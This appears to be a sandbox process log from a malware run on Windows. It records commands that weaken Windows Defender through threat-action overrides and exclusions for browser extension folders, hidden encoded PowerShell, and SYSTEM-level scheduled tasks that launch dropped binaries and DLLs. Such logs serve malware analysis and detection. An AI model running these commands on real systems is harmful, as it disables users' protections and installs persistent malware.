C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gGldCqBSz" /SC once /ST 01:48:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gGldCqBSz"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gGldCqBSz"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FPIEUdZLMYPzsiUNM" /SC once /ST 01:35:17 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe\" Wy /WFYUdidbY 757674 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "FPIEUdZLMYPzsiUNM"
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe Wy /WFYUdidbY 757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 124 -ip 124
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 124 -s 916
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bEtnHIcecDUtXwQuWS"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UQtSSXvqU\oSfFis.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OcPshDNvhDnVmSv" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "OcPshDNvhDnVmSv2" /F /xml "C:\Program Files (x86)\UQtSSXvqU\DrWtGlG.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "OcPshDNvhDnVmSv"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "OcPshDNvhDnVmSv"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qjEkZtbojbmFFd" /F /xml "C:\Program Files (x86)\AMqhlrBDqRJU2\eobpTYI.xml" /RU "SYSTEM"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2856 --field-trial-handle=2860,i,2291932801383301685,3688407703392993180,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "SzzOVfCIijTTD2" /F /xml "C:\ProgramData\CSlqozbqXBZGgaVB\FCOOAZD.xml" /RU "SYSTEM"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2952 --field-trial-handle=2860,i,2291932801383301685,3688407703392993180,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2976 --field-trial-handle=2860,i,2291932801383301685,3688407703392993180,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3136 --field-trial-handle=2860,i,2291932801383301685,3688407703392993180,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3148 --field-trial-handle=2860,i,2291932801383301685,3688407703392993180,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "PiigmmnlzELKpVpJK2" /F /xml "C:\Program Files (x86)\OJBbginKvssDnbEKbsR\SgeNsET.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "XrMInsNlrWTcBhRONQr2" /F /xml "C:\Program Files (x86)\hMiQKFvmPLjeC\NdFpdWB.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MRTHivZIQsRdEanwm" /SC once /ST 00:23:06 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\JnWpMSyk\bdOQzjG.dll\",#1 /RndidUWMO 757674" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "MRTHivZIQsRdEanwm"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\JnWpMSyk\bdOQzjG.dll",#1 /RndidUWMO 757674
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\JnWpMSyk\bdOQzjG.dll",#1 /RndidUWMO 757674
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1660
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FACte1" /SC once /ST 01:59:58 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2128
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "FACte1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xe4,0xe8,0xdc,0xe0,0x10c,0x7ff81e313cb8,0x7ff81e313cc8,0x7ff81e313cd8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1844
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "MRTHivZIQsRdEanwm"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2060 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3432 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3800 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
